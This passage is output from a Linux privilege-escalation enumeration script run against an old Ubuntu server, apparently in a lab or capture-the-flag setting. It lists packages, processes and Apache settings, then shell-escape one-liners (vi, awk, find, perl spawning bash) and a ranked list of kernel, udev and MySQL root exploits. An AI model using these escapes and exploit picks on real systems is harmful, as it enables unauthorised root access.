libpq5 8.3.7-0ubuntu8.04.1 C client library
libreadline5 5.2-3build1 readline and history libraries, run-time libraries
librpc-xml-perl 0.59-2 module implementation of XML-RPC
libsasl2-2 2.1.22.dfsg1-18ubuntu2.1 SASL - authentication abstraction library
libsasl2-modules 2.1.22.dfsg1-18ubuntu2.1 SASL - pluggable authentication modules
libselinux1 2.0.55-0ubuntu4 policy enforcement, run-time libraries
libsepol1 2.0.20-0ubuntu3 binary policy, run-time library
libsigc++-2.0-0c2a 2.0.17-2ubuntu3 Signal Framework for C++ - runtime
libslang2 2.1.3-2 S-Lang programming library - runtime version
libsqlite3-0 3.4.2-2 3 shared library
libss2 1.40.8-2ubuntu2 interface parsing library
libssl0.9.8 0.9.8g-4ubuntu3.7 shared libraries
libstdc++6 4.2.4-1ubuntu4 GNU Standard C++ Library v3
libsysfs2 2.1.0-4 library to sysfs
libtasn1-3 1.1-1 ASN.1 structures (runtime)
libterm-readkey-perl 2.30-3ubuntu1 perl module for simple terminal control
libtext-charwidth-perl 0.04-4build1 display widths of characters on the terminal
libtext-iconv-perl 1.4-3 between character sets in Perl
libtext-wrapi18n-perl 0.06-5 substitute of Text::Wrap
liburi-perl 1.35.dfsg.1-1 and accesses URI strings
libusb-0.1-4 2:0.1.12-8 USB programming library
libuuid1 1.40.8-2ubuntu2 unique id library
libvolume-id0 117-8ubuntu0.2 identification library
libwrap0 7.6.dbs-14 Venema's TCP wrappers library
libwww-perl 5.808-1 client/server library for Perl (aka LWP)
libxml-parser-perl 2.34-4.3 module for parsing XML files
libxml2 2.6.31.dfsg-2ubuntu1.3 XML library
linux-image-2.6.24-24-server 2.6.24-24.56 kernel image for version 2.6.24 on x86/x86_64
linux-image-server 2.6.24.24.26 kernel image on Server Equipment.
linux-server 2.6.24.24.26 Linux kernel on Server Equipment.
linux-ubuntu-modules-2.6.24-24-serve 2.6.24-24.39 supplied Linux modules for version 2.6.24 on x86/x86_64
locales 2.7.9-4 files for locale support
login 1:4.0.18.2-1ubuntu2.2 login tools
logrotate 3.7.1-3ubuntu0.8.04 rotation utility
lsb-base 4.0-0ubuntu0.8.04.1 Standard Base 4.0 init script functionality
lsb-release 4.0-0ubuntu0.8.04.1 Standard Base version reporting utility
lshw 02.12.01-2ubuntu1.1 about hardware configuration
lsof 4.78.dfsg.1-3 open files
ltrace 0.5-3ubuntu1 runtime library calls in dynamically linked programs
lzma 4.43-12ubuntu1 method of 7z format in 7-Zip program
makedev 2.3.1-84ubuntu1 device files in /dev
man-db 2.5.1-3 manual pager
manpages 2.77-1 pages about using a GNU/Linux system
mawk 1.3.3-11ubuntu2 pattern scanning and text processing language
memtest86+ 1.70-3ubuntu1 real-mode memory tester
mii-diag 2.11-2 little tool to manipulate network cards
mime-support 3.39-1ubuntu1 files 'mime.types' & 'mailcap', and support programs
mktemp 1.5-5ubuntu2 unique filenames for temporary files
mlocate 0.18-2ubuntu1 find files on the filesystem based on their name
module-init-tools 3.3-pre11-4ubuntu5.8.04.1 for managing Linux kernel modules
mount 2.13.1-5ubuntu3 for mounting and manipulating filesystems
mtr-tiny 0.72-2ubuntu1 screen ncurses traceroute tool
mysql-client-5.0 5.0.51a-3ubuntu5.4 database client binaries
mysql-common 5.0.51a-3ubuntu5.4 database common files
mysql-server 5.0.51a-3ubuntu5.4 database server (meta package depending on the latest version)
mysql-server-5.0 5.0.51a-3ubuntu5.4 database server binaries
nano 2.0.7-1ubuntu1 Pico clone with some new features
ncurses-base 5.6+20071124-1ubuntu2 of common terminal types
ncurses-bin 5.6+20071124-1ubuntu2 programs and man pages
net-tools 1.60-19ubuntu1 NET-3 networking toolkit
netbase 4.30ubuntu1 TCP/IP networking system
netcat-traditional 1.10-36 swiss army knife
ntfs-3g 1:1.2216-1ubuntu3 NTFS driver for FUSE
ntpdate 1:4.2.4p4+dfsg-3ubuntu2.2 for setting system time from NTP servers
openssh-blacklist 0.1-1ubuntu0.8.04.1 of blacklisted OpenSSH RSA and DSA keys
openssh-client 1:4.7p1-8ubuntu1.2 shell client, an rlogin/rsh/rcp replacement
openssh-server 1:4.7p1-8ubuntu1.2 shell server, an rshd replacement
parted 1.7.1-5.1ubuntu9.2 GNU Parted disk partition resizing program
passwd 1:4.0.18.2-1ubuntu2.2 and administer password and group data
pciutils 1:2.2.4-1.1ubuntu6 PCI Utilities
pcmciautils 014-4ubuntu1 utilities for Linux 2.6
perl 5.8.8-12ubuntu0.4 Wall's Practical Extraction and Report Language
perl-base 5.8.8-12ubuntu0.4 Pathologically Eclectic Rubbish Lister
perl-modules 5.8.8-12ubuntu0.4 Perl modules
php5-common 5.2.4-2ubuntu5.6 files for packages built from the php5 source
php5-mysql 5.2.4-2ubuntu5.6 module for php5
popularity-contest 1.43ubuntu1 for your favourite packages automatically
ppp 2.4.4rel-9ubuntu2 Protocol (PPP) daemon
pppconfig 2.3.17ubuntu1 text menu based utility for configuring ppp
pppoeconf 1.17ubuntu1 PPPoE/ADSL connections
procps 1:3.2.7-5ubuntu3 file system utilities
psmisc 22.6-1 that use the proc filesystem
python 2.5.2-0ubuntu1 interactive high-level object-oriented language (default version)
python-apt 0.7.4ubuntu7.5 interface to libapt-pkg
python-central 0.6.7ubuntu0.1 and build utility for Python packages
python-gdbm 2.5.2-0ubuntu2 dbm database support for Python
python-gnupginterface 0.3.2-9ubuntu1 interface to GnuPG (GPG)
python-minimal 2.5.2-0ubuntu1 minimal subset of the Python language (default version)
python-support 0.7.5ubuntu1 rebuilding support for python modules
python2.5 2.5.2-2ubuntu4.1 interactive high-level object-oriented language (version 2.5)
python2.5-minimal 2.5.2-2ubuntu4.1 minimal subset of the Python language (version 2.5)
readline-common 5.2-3build1 readline and history libraries, common files
reiserfsprogs 1:3.6.19-6 tools for ReiserFS filesystems
rsync 2.6.9-6ubuntu2 remote file copy program (like rcp)
samba 3.0.28a-1ubuntu4.8 LanManager-like file and printer server for Unix
samba-common 3.0.28a-1ubuntu4.8 common files used by both the server and the client
samba-doc 3.0.28a-1ubuntu4.8 documentation
sed 4.1.5-5 GNU sed stream editor
smbclient 3.0.28a-1ubuntu4.8 LanManager-like simple client for Unix
smbfs 3.0.28a-1ubuntu4.8 and umount commands for the smbfs (for kernels >= than 2.2.x)
startup-tasks 0.3.9-2 of essential tasks to run on startup
strace 4.5.15-1.1ubuntu1 system call tracer
sudo 1.6.9p10-1ubuntu3.4 limited super user privileges to specific users
sysklogd 1.5-1ubuntu1 Logging Daemon
system-services 0.3.9-2 of essential system services
sysv-rc 2.86.ds1-14.1ubuntu45.1 runlevel change mechanism
sysvutils 2.86.ds1-14.1ubuntu45.1 utilities
tar 1.19-3 version of the tar archiving utility
tasksel 2.70ubuntu6 for selecting tasks for installation on Debian systems
tasksel-data 2.70ubuntu6 tasks used for installation of Debian systems
tcpd 7.6.dbs-14 Venema's TCP wrapper utilities
tcpdump 3.9.8-2 powerful tool for network monitoring and data acquisition
telnet 0.17-35ubuntu1 telnet client
time 1.7-21build1 GNU time program for measuring cpu resource usage
tzdata 2009j-0ubuntu0.8.04 zone and daylight-saving time data
ubuntu-keyring 2008.03.04 keys of the Ubuntu archive
ubuntu-minimal 1.102 core of Ubuntu
ubuntu-standard 1.102 Ubuntu standard system
ucf 3.005 Configuration File: preserve user changes to config files.
udev 117-8ubuntu0.2 device node and kernel event manager
ufw 0.16.2.4 for managing a netfilter firewall
update-inetd 4.27-0.6 updater
update-manager-core 1:0.87.31 release upgrades
upstart 0.3.9-2 init daemon
upstart-compat-sysv 0.3.9-2 for System-V-like init
upstart-logd 0.3.9-2 logging daemon
usbutils 0.73-5ubuntu2 USB utilities
util-linux 2.13.1-5ubuntu3 system utilities
util-linux-locales 2.13.1-5ubuntu3 files for util-linux
uuid-runtime 1.40.8-2ubuntu2 unique id library
vim-common 1:7.1-138+1ubuntu3.1 IMproved - Common files
vim-tiny 1:7.1-138+1ubuntu3.1 IMproved - enhanced vi editor - compact version
w3m 0.5.1-5.1ubuntu1 browsable pager with excellent tables/frames support
wget 1.10.2-3ubuntu1 files from the web
whiptail 0.52.2-11.2ubuntu1 user-friendly dialog boxes from shell scripts
winbind 3.0.28a-1ubuntu4.8 to resolve user and group information from Windows NT servers
wireless-tools 29-1ubuntu2 for manipulating Linux Wireless Extensions
wpasupplicant 0.6.0+0.5.8-0ubuntu2 support for WPA and WPA2 (IEEE 802.11i)
xkb-data 1.1~cvs.20080104.1-1ubuntu8 Keyboard Extension (XKB) configuration data
zlib1g 1:1.2.3.3.dfsg-7ubuntu1 library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 12:25 0:01 /sbin/init
root 2 12:25 0:00 [kthreadd]
root 3 12:25 0:00 [migration/0]
root 4 12:25 0:00 [ksoftirqd/0]
root 5 12:25 0:00 [watchdog/0]
root 6 12:25 0:00 [events/0]
root 7 12:25 0:00 [khelper]
root 41 12:25 0:00 [kblockd/0]
root 44 12:25 0:00 [kacpid]
root 45 12:25 0:00 [kacpi_notify]
root 174 12:25 0:00 [kseriod]
root 213 12:25 0:00 [pdflush]
root 214 12:25 0:00 [pdflush]
root 215 12:25 0:00 [kswapd0]
root 257 12:25 0:00 [aio/0]
root 1481 12:25 0:00 [ata/0]
root 1484 12:25 0:00 [ata_aux]
root 1493 12:25 0:00 [scsi_eh_0]
root 1497 12:25 0:00 [scsi_eh_1]
root 1510 12:25 0:00 [ksuspend_usbd]
root 1515 12:25 0:00 [khubd]
root 2363 12:25 0:00 [scsi_eh_2]
root 2461 12:25 0:00 [scsi_eh_3]
root 2462 12:25 0:00 [scsi_eh_4]
root 2463 12:25 0:00 [scsi_eh_5]
root 2464 12:25 0:00 [scsi_eh_6]
root 2465 12:25 0:00 [scsi_eh_7]
root 2466 12:25 0:00 [scsi_eh_8]
root 2467 12:25 0:00 [scsi_eh_9]
root 2468 12:25 0:00 [scsi_eh_10]
root 2469 12:25 0:00 [scsi_eh_11]
root 2470 12:25 0:00 [scsi_eh_12]
root 2471 12:25 0:00 [scsi_eh_13]
root 2472 12:25 0:00 [scsi_eh_14]
root 2473 12:25 0:00 [scsi_eh_15]
root 2474 12:25 0:00 [scsi_eh_16]
root 2475 12:25 0:00 [scsi_eh_17]
root 2476 12:25 0:00 [scsi_eh_18]
root 2477 12:25 0:00 [scsi_eh_19]
root 2478 12:25 0:00 [scsi_eh_20]
root 2479 12:25 0:00 [scsi_eh_21]
root 2480 12:25 0:00 [scsi_eh_22]
root 2481 12:25 0:00 [scsi_eh_23]
root 2482 12:25 0:00 [scsi_eh_24]
root 2483 12:25 0:00 [scsi_eh_25]
root 2484 12:25 0:00 [scsi_eh_26]
root 2485 12:25 0:00 [scsi_eh_27]
root 2486 12:25 0:00 [scsi_eh_28]
root 2487 12:25 0:00 [scsi_eh_29]
root 2488 12:25 0:00 [scsi_eh_30]
root 2489 12:25 0:00 [scsi_eh_31]
root 2490 12:25 0:00 [scsi_eh_32]
root 2682 12:25 0:00 [kjournald]
root 2853 12:25 0:00 /sbin/udevd
root 3155 12:25 0:00 [kgameportd]
root 3304 12:25 0:00 [kpsmoused]
root 4606 12:25 0:00 /sbin/getty
root 4608 12:25 0:00 /sbin/getty
root 4614 12:25 0:00 /sbin/getty
root 4618 12:25 0:00 /sbin/getty
root 4622 12:25 0:00 /sbin/getty
syslog 4655 12:25 0:00 /sbin/syslogd
root 4674 12:25 0:00 /bin/dd
klog 4676 12:25 0:00 /sbin/klogd
root 4695 12:25 0:00 /usr/sbin/sshd
root 4751 12:25 0:00 /bin/sh
root 4793 12:25 0:04 /usr/sbin/mysqld
root 4795 12:25 0:00 logger
root 4868 12:25 0:00 /usr/sbin/nmbd
root 4870 12:25 0:00 /usr/sbin/smbd
root 4878 12:25 0:00 /usr/sbin/smbd
root 4885 12:25 0:00 /usr/sbin/winbindd
root 4887 12:25 0:00 /usr/sbin/winbindd
daemon 4906 12:25 0:00 /usr/sbin/atd
root 4917 12:25 0:00 /usr/sbin/cron
root 4939 12:25 0:00 /usr/sbin/apache2
dhcp 4999 12:25 0:00 dhclient
root 5006 12:25 0:00 /sbin/getty
www-data 5066 12:33 0:01 /usr/sbin/apache2
root 5150 12:33 0:00 /usr/sbin/winbindd
root 5151 12:33 0:00 /usr/sbin/winbindd
www-data 5221 12:51 0:00 /usr/sbin/apache2
www-data 5222 12:51 0:00 /usr/sbin/apache2
www-data 5223 12:51 0:00 /usr/sbin/apache2
www-data 5225 12:51 0:00 /usr/sbin/apache2
www-data 5226 12:51 0:00 /usr/sbin/apache2
www-data 5233 12:53 0:00 /usr/sbin/apache2
www-data 5235 12:53 0:00 /usr/sbin/apache2
root 5530 13:29 0:00 sshd:
john 5532 13:29 0:01 sshd:
john 5533 13:29 0:00 python
john 5540 13:29 0:00 [sh]
john 5547 13:30 0:00 sh
john 5548 13:30 0:00 /bin/bash
john 5627 13:37 0:00 /bin/bash
john 12984 14:56 0:00 /usr/bin/python
john 13159 14:56 0:00 /bin/sh
john 13160 14:56 0:00 ps
[+] Apache Version and Modules
Server version: Apache/2.2.8 (Ubuntu)
Server built: Jun 18 2009 08:47:00
[+] Apache Config File
#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
</IfModule>
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule mpm_worker_module>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# ServerTokens
# This directive configures what you return as the Server HTTP response
# Header. The default is 'Full' which sends information about the OS-Type
# and compiled in modules.
# Set to one of: Full | OS | Minor | Minimal | Major | Prod
# where Full conveys the most information, and Prod the least.
#
ServerTokens Full
#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (internal error documents, FTP directory
# listings, mod_status and mod_info output etc., but not CGI generated
# documents or custom error documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of: On | Off | EMail
#
ServerSignature On
#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#
#
# Putting this all together, we can internationalize error responses.
#
# We use Alias to redirect any /error/HTTP_<error>.html.var response to
# our collection of by-error message multi-language collections. We use
# includes to substitute the appropriate text.
#
# You can modify the messages' appearance without changing any of the
# default HTTP_<error>.html.var files by adding the line:
#
# Alias /error/include/ "/your/include/path/"
#
# which allows you to create your own set of files by starting with the
# /usr/share/apache2/error/include/ files and copying them to /your/include/path/,
# even on a per-VirtualHost basis. The default include files will display
# your Apache version number and your ServerAdmin email address regardless
# of the setting of ServerSignature.
#
# The internationalized error documents require mod_alias, mod_include
# and mod_negotiation. To activate them, uncomment the following 30 lines.
# Alias /error/ "/usr/share/apache2/error/"
#
# <Directory "/usr/share/apache2/error">
# AllowOverride None
# Options IncludesNoExec
# AddOutputFilter Includes html
# AddHandler type-map var
# Order allow,deny
# Allow from all
# LanguagePriority en cs de es fr it nl sv pt-br ro
# ForceLanguagePriority Prefer Fallback
# </Directory>
#
# ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
# ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
# ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
# ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
# ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
# ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
# ErrorDocument 410 /error/HTTP_GONE.html.var
# ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
# ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
# ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
# ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
# ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
# ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
# ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
# ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
# ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
# ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
Include /etc/apache2/conf.d/
# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.6.9p10
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 2482 12:25 0:00 [scsi_eh_24]
root 2682 12:25 0:00 [kjournald]
root 4795 12:25 0:00 logger
root 2468 12:25 0:00 [scsi_eh_10]
root 44 12:25 0:00 [kacpid]
root 4793 12:25 0:04 /usr/sbin/mysqld
root 4885 12:25 0:00 /usr/sbin/winbindd
root 41 12:25 0:00 [kblockd/0]
root 2475 12:25 0:00 [scsi_eh_17]
root 2465 12:25 0:00 [scsi_eh_7]
root 2490 12:25 0:00 [scsi_eh_32]
root 257 12:25 0:00 [aio/0]
root 3304 12:25 0:00 [kpsmoused]
root 2476 12:25 0:00 [scsi_eh_18]
root 4606 12:25 0:00 /sbin/getty
root 4618 12:25 0:00 /sbin/getty
root 1484 12:25 0:00 [ata_aux]
root 1481 12:25 0:00 [ata/0]
root 215 12:25 0:00 [kswapd0]
root 2474 12:25 0:00 [scsi_eh_16]
root 5 12:25 0:00 [watchdog/0]
root 5530 13:29 0:00 sshd:
root 2464 12:25 0:00 [scsi_eh_6]
root 5150 12:33 0:00 /usr/sbin/winbindd
root 45 12:25 0:00 [kacpi_notify]
root 4868 12:25 0:00 /usr/sbin/nmbd
root 1497 12:25 0:00 [scsi_eh_1]
root 5151 12:33 0:00 /usr/sbin/winbindd
root 2461 12:25 0:00 [scsi_eh_3]
root 2466 12:25 0:00 [scsi_eh_8]
root 4878 12:25 0:00 /usr/sbin/smbd
root 5006 12:25 0:00 /sbin/getty
root 1515 12:25 0:00 [khubd]
root 2485 12:25 0:00 [scsi_eh_27]
root 4870 12:25 0:00 /usr/sbin/smbd
root 2488 12:25 0:00 [scsi_eh_30]
root 174 12:25 0:00 [kseriod]
root 2489 12:25 0:00 [scsi_eh_31]
root 1510 12:25 0:00 [ksuspend_usbd]
root 2484 12:25 0:00 [scsi_eh_26]
root 2480 12:25 0:00 [scsi_eh_22]
root 1 12:25 0:01 /sbin/init
Possible Related Packages:
busybox-initramfs 1:1.1.3-5ubuntu12 shell setup for initramfs
initramfs-tools 0.85eubuntu39.3 for generating an initramfs
initscripts 2.86.ds1-14.1ubuntu45.1 for initializing and shutting down the system
libklibc 1.5.7-4ubuntu4 libc subset for use with initramfs
lsb-base 4.0-0ubuntu0.8.04.1 Standard Base 4.0 init script functionality
module-init-tools 3.3-pre11-4ubuntu5.8.04.1 for managing Linux kernel modules
upstart 0.3.9-2 init daemon
upstart-compat-sysv 0.3.9-2 for System-V-like init
root 4614 12:25 0:00 /sbin/getty
root 3 12:25 0:00 [migration/0]
root 2472 12:25 0:00 [scsi_eh_14]
root 2486 12:25 0:00 [scsi_eh_28]
root 4 12:25 0:00 [ksoftirqd/0]
root 2470 12:25 0:00 [scsi_eh_12]
root 7 12:25 0:00 [khelper]
root 2469 12:25 0:00 [scsi_eh_11]
root 2471 12:25 0:00 [scsi_eh_13]
root 2483 12:25 0:00 [scsi_eh_25]
root 2479 12:25 0:00 [scsi_eh_21]
root 4608 12:25 0:00 /sbin/getty
root 2477 12:25 0:00 [scsi_eh_19]
root 214 12:25 0:00 [pdflush]
root 6 12:25 0:00 [events/0]
root 2363 12:25 0:00 [scsi_eh_2]
root 4887 12:25 0:00 /usr/sbin/winbindd
root 4622 12:25 0:00 /sbin/getty
root 2467 12:25 0:00 [scsi_eh_9]
root 4695 12:25 0:00 /usr/sbin/sshd
root 2 12:25 0:00 [kthreadd]
root 3155 12:25 0:00 [kgameportd]
root 2853 12:25 0:00 /sbin/udevd
root 4751 12:25 0:00 /bin/sh
root 2481 12:25 0:00 [scsi_eh_23]
root 4939 12:25 0:00 /usr/sbin/apache2
Possible Related Packages:
apache2 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apache2-mpm-prefork 2.2.8-1ubuntu0.9 model for Apache HTTPD
apache2-utils 2.2.8-1ubuntu0.9 programs for webservers
apache2.2-common 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
libapache2-mod-php5 5.2.4-2ubuntu5.6 HTML-embedded scripting language (apache 2 module)
root 2478 12:25 0:00 [scsi_eh_20]
root 4674 12:25 0:00 /bin/dd
root 2463 12:25 0:00 [scsi_eh_5]
root 2487 12:25 0:00 [scsi_eh_29]
root 2462 12:25 0:00 [scsi_eh_4]
root 4917 12:25 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-100ubuntu2.1 of regular background processing
root 2473 12:25 0:00 [scsi_eh_15]
root 213 12:25 0:00 [pdflush]
root 1493 12:25 0:00 [scsi_eh_0]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/bin/netcat
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- < 2.6.29 exit_notify() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8369 || Language=c
- 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || http://www.exploit-db.com/exploits/9844 || Language=python
- < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || http://www.exploit-db.com/exploits/14814 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || http://www.exploit-db.com/exploits/5092 || Language=c
- Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || http://www.exploit-db.com/exploits/9083 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [2] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- Linux RDS Protocol Local Privilege Escalation || http://www.exploit-db.com/exploits/15285 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- Test Kernel Local Root Exploit 0day || http://www.exploit-db.com/exploits/9191 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- < 2.6.36.2 Econet Privilege Escalation Exploit || http://www.exploit-db.com/exploits/17787 || Language=c
